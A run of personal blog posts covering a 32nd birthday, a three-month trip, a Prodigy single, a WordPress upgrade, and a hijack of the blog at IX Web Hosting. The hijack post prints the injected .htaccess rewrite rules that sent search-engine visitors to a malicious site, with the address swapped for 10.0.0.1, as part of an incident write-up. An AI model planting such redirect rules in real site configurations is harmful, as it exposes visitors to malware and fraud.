Happy Birthday To Me. I’m 32

I can’t believe I’m 32 already. It seems like only yesterday I wrote the post about my 31st birthday. But no… I checked and it was one year ago. So what happened over the last year? Let’s recount…

On the personal level, well… friends have gone in and out of my life, specifically one new friend that I’m inclined not to talk about which is unfortunate because the last month or so has been pretty great thanks to her. I’ve also spent the last 2 months getting ready for and planning my trip. That was nice, too. The next three months are going to be even better, but this stuff will be included in my post one year from now.

On the professional level, Diligent Technologies was acquired by IBM and now I’m an IBM employee. And two days from now I’ll be an IBM employee on a 3 months vacation. Take that, suckers :) Seriously, though, working for IBM is still not too much different – we do the same work only we got many more big black IBM boxes in our lab than before, a new coffee machine, constant cereal supply and laptops. The switch from a startup to a huge company has been kind of exciting. To say the least it’s a once-in-a-lifetime experience.

So it’s been a pretty eventful year. That’s a good thing. When I started writing I thought it was going to be another “nothing much happened” post, but it turned out to be more satisfying than that.

All 6 readers of this blog are welcome to leave their birthday wishes in the comments. Calling is even better :)

This Blog Was Hijacked. Shame On IX Web Hosting

Yesterday my brother called me up to let me know that when clicking a link in Google Reader to get to this blog, a malicious website appears instead of the blog. I tried it myself and he was right. The strange thing was that if you tried to enter the address yourself it worked but only if you clicked a link inside Google Reader you would get to the malicious website.

I tried looking for what could have gone wrong. As I couldn’t find anything, I assumed maybe some kind of DNS poisoning occurred, that the solution is out of my reach and that if I wait it out a little bit everything will be back to normal.

So today I checked again and the problem still persisted. I decided to look further into things. Remembering an email message I got from my host, IX Web Hosting, I looked it up. Here it is:

Dear Amit,

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting
http://www.ixwebhosting.com

When I first got this message I thought it was a hoax. Considering that the computers I use to access my website all have Linux installed, “blaming” me for having the infamous Anti-Virus 2009 (which is a relatively new and very aggressive virus) on my computers is simply wrong, being impossible and all. So I ignored the message but still kept it (I thought about contacting IX Web Hosting to ask whether this was real but just forgot about it.)

Reading the message from IX Web Hosting again, though, got me to check my .htaccess file. And indeed the file contained the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]

These lines mean that if you get to this website from any of the well-known search engines you will be redirected to the address at the last line (I changed the IP address intentionally.) Once I deleted the file from the website’s root directory everything was back to normal. Now I wanted to know how long my blog had been hijacked. My Google Analytics account revealed the answer: my search engines sources dropped to almost zero around December 14th (about a month ago.)

Digging further, I found this post on the IX Web Hosting Warning blog. The writer of the post seems to think, like me, that IX Web Hosting are simply trying to shift the blame to the customers, which is a big shame.

Up until today I was generally happy with IX Web Hosting. I almost never had any problems with the website and whenever I needed support they answered quickly and resolved any issues I had. But reading through the IX Web Hosting Warning blog made me want to switch hosts (again.) I guess I’ll do that when I’m back from my trip and hope for the best until then. I just can’t be bothered right now with switching hosts.

The “Big Trip”

I wanted to post about my upcoming 3 months long trip for a while now, but I was just… well… lazy.

The trip starts January 25th, just 2 days after my 32nd birthday. I’ll be back in Israel April 19th. The general plan is:

  • 5 weeks in the US. Basically a coast-to-coast trip which includes visiting friends along the way. I still have to plan a course for this part of the trip
  • 3 weeks in Thailand, where I plan to lay around on some beach and do nothing.
  • 3 weeks in the UK. Meeting friends and going to 4 Prodigy shows is what I currently have in mind.

All 6 readers of this blog are welcome to call and say their goodbyes.

The Prodigy – Invaders Must Die

Yesterday The Prodigy released their new single, Invaders Must Die, which will be the opening track of an album by the same name to be released March 2nd. Personally I love the new track. It’s fresh and fun to listen to. However, most “hardcore” fans are pretty disappointed.

You can download the track for free from the download page in the next 6 days or listen to it right here (quality and loud headphones/speakers recommended.)

This Is An Upgraded Blog

Finally I took the time and courage to update my blog’s software. It is now running WordPress 2.6.3, the latest and greatest from the good people at WordPress.org. To upgrade the blog I first had to convert the database to a utf8_unicode_ci collation. It was already Unicode, but the collation wasn’t set right. That was frightening stuff by itself, since these kind of changes can convert all my Hebrew posts to common Gibberish. Naturally I tested this on my home copy of the blog and had everything backed up beforehand, but still…

The upgrade process went very smoothly and lasted for about 15 minutes (I doubt any of the 6 readers of this blog saw the “I’m upgrading” message I put on the front page). I chose the extended upgrade instructions which include the scary step of deleting almost everything from the server. But it’s the cleaner way to go. I was pleasantly surprised to learn the WordPress now supports “Unicode connections” (or whatever the formal name is) to the database so I don’t need to hack the wp-db.php file like I used to before following upgrades.

The reason for the upgrade is my upcoming trip. I would like to use the blog to post updates and pictures from the trip. I still need to choose a solution for posting pictures. There are many to choose from.

Hebrew is still aligned to the left. I’ll get to that soon. Now… let’s see if this post goes through :)